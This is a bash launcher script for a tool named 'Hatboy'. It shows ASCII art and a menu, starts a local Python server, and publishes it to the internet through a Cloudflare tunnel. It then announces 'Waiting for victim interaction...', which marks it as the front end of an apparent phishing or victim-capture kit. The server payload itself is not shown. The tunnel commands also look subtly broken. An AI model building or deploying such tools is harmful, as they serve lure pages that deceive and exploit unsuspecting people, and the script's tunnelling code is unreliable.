#!/bin/bash

# Display Hatboy ASCII Art
printf "\e[1;92m        _____  \e[0m\n"
printf "\e[1;92m       /     \ \e[0m\n"
printf "\e[1;92m      | () () |\e[0m\n"
printf "\e[1;92m       \  ^  / \e[0m\n"
printf "\e[1;92m        |||||  \e[0m\n"
printf "\e[1;92m        |||||  \e[0m\n"
printf "\e[1;77m     __/_____\__ \e[0m\n"
printf "\e[1;77m    |___________| \e[0m\n"
printf "\e[1;77m     MISTER  X \e[0m\n"

# Menu for starting the tool
echo "Welcome to Hatboy!"
echo "Please select an option to start:"
echo "1. Start Local Server"
echo "2. Use Cloudflare Tunnel"
read -p "Select an option (1 or 2): " option

if [[ $option -eq 1 ]]; then
    echo "Starting local server..."
    python3 hatboy_server.py
elif [[ $option -eq 2 ]]; then
    echo "Starting Cloudflare Tunnel..."

    # Submenu for template selection
    echo "Select a template:"
    echo "1. Default Template"
    read -p "Select a template (1): " template_option

    if [[ $template_option -eq 1 ]]; then
        echo "Using Default Template..."
        python3 hatboy_server.py &  # Start local server on port 8080

        sleep 3  # Allow server to initialize

        # Start Cloudflare Tunnel on port 4444 and map it to the local server
        echo "Starting Cloudflare Tunnel on port 4444..."
        cloudflared tunnel --url http://localhost:8080 --port 4444 &

        sleep 5  # Wait for Cloudflare service to initialize

        # Fetch the live URL generated by Cloudflare
        CLOUDFLARE_URL=$(cloudflared tunnel list | grep 4444 | awk '{print $4}')

        if [[ -n "$CLOUDFLARE_URL" ]]; then
            echo -e "\nYour site is live at: \e[1;92m$CLOUDFLARE_URL\e[0m"
            echo "Waiting for victim interaction..."
        else
            echo -e "\n\e[1;91mERROR:\e[0m Could not retrieve the live URL. Check Cloudflare Tunnel logs."
        fi
    else
        echo "Invalid template selection!"
    fi
else
    echo "Invalid option! Exiting..."
fi
